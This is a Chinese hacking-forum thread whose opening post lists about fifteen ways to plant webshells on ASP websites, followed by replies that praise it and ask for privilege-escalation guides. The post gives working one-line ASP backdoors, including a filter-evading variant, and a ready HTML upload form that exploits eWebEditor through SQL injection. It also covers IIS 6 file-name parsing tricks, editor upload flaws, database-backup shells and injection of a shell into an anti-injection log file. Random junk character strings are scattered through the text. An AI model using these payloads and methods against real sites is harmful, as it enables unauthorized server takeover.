返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式. D+ v, D* `3 m2 C

5 r( V) O# D6 C5 `& H: N3 t' o: W2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp
; i/ v, K2 j" I
* G, e6 Z& b* @7 L3.上传漏洞:
" S; P, C7 C! m6 m% n
6 D2 S6 `# o- [3 L; o; T9 f2 X3 [# F$ J动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00
- K+ r) G5 ~" }# X. R& ?3 q. v6 W' n
5 C) O3 K& L+ T' c, Y# s9 d逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件/ i+ i- N3 x; q! w! Q. E

7 P( s( Q- b3 {& ]( e( E% M雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp0 q# A3 z$ r% F/ H- w; p; E+ |
然后在上传文件里面填要传的图片格式的ASP木马
4 n! A) v% o- m就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp
' W1 J: Z9 c: U: ]# U4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传
3 p# s9 a7 L  n7 G
* q% X+ t4 c! }, {' I<html>
) w9 w# h0 O6 m" r" p+ w/ r7 @<head>
% y9 ?$ c7 j8 x% J' b. X7 h9 U) O3 a<title>ewebeditor upload.asp上传利用</title>! I, r: P8 I0 ~, x, _
</head>7 R, _5 E( m2 A4 N+ g
<body>4 |7 U2 R6 ~! f
<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">0 z8 i/ L7 j4 R0 F8 {
<input type=file name=uploadfile size=100><br><br>
7 l$ w2 [2 j8 }7 f1 |<input type=submit value=Fuck>
' r$ v. o6 \1 D</form>/ F: N- }* G1 o
</body>) L5 O; _! s# S
</form>
5 }% d2 I* O' M</html>
) _0 s) W4 I& ]& p# R5 F! C; e$ d1 G. n2 [2 {! x
2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问
% {/ r( X% e- |$ N# G4 @3 {5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp9 ~' d' _; ?! ^8 w) j4 z- `
# x$ N- P# ?8 `
利用windows2003解析。建立zjq.asp的文件夹( Z5 `/ G7 F1 m# X
! p7 ^% G& s! G
6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型
) L, L& c% d% i+ L. U: G$ E% s0 Q$ D
7 R0 g, B; b2 @4 b7.cuteeditor:类似ewebeditor
8 M. M# |9 w' k+ h9 ]! S
2 v5 O$ J0 N4 v, o& o8.htmleditor:同上
" J" ~2 M3 \. L% x$ x8 |1 ~- Q0 v/ Y9 n7 o- M! Z8 r
9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破, u4 O% Q  s; b) Z% _, S6 |9 \
! p" O  P2 C1 M: }* \$ \
<%execute request("value")%><%'<% loop <%:%>
% u# G9 b4 @- y( h% X/ z; |
* c/ ?  e) z6 {+ @' n, T. b6 F<%'<% loop <%:%><%execute request("value")%>$ [+ q' B5 Q7 [1 c  M& E
9 Q  {, u1 v3 b8 R' L; J! {. m
<%execute request("value")'<% loop <%:%>
1 O$ _: ~- L, B* v# n, c$ I9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞4 V0 M6 I: {& {; c

8 A' E+ U0 r8 A7 [+ F10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞( s* m/ j5 |; I
! y# j1 Z1 V5 d* o) q  L7 j
11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3
  a. y! D0 ?! U/ f) k8 ]$ ?9 k* _6 M& {/ V' `) o1 ~  f
解析漏洞得到webshell
" p. J( t0 P1 h8 o. k" o  m9 y/ [/ S" ?$ M3 b, w! g1 F& ?% }
12.mssql差异备份,日志备份,前提需知道web路径
" @3 n# ~( [- e- @
( U3 j) ]* q. h3 t13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell
+ ~8 c) f/ c8 k2 \2 I0 E& c3 b. ?9 b6 q; \
14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell5 i/ h, x. K8 g7 z$ `8 @/ r
4 u! d- n. c9 N7 w6 R: j. H  L
15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
7 Y  e! {2 ]$ ]/ f6 Q! m. e
: h4 p/ j( \0 p以上只是本人的一些拙见,并不完善,以后想到了再继续添加: ?  v' e. n/ b" ?2 u
不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520 $ h; |+ }* m! {

  q& x1 r  H/ p$ k- L5 x, V# l* w( M4 ]& }8 F4 s( t( ?. R
很好啊、基本的入侵方法都包含了$ ?7 ^6 B5 D3 h7 i" C
( s) X% V8 Z: C7 c/ w" k3 q; O
最好来个提权的帖子再。
: @3 s9 q( [0 m: p6 Q
3 T+ Z3 j: `. _0 Q/ S不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表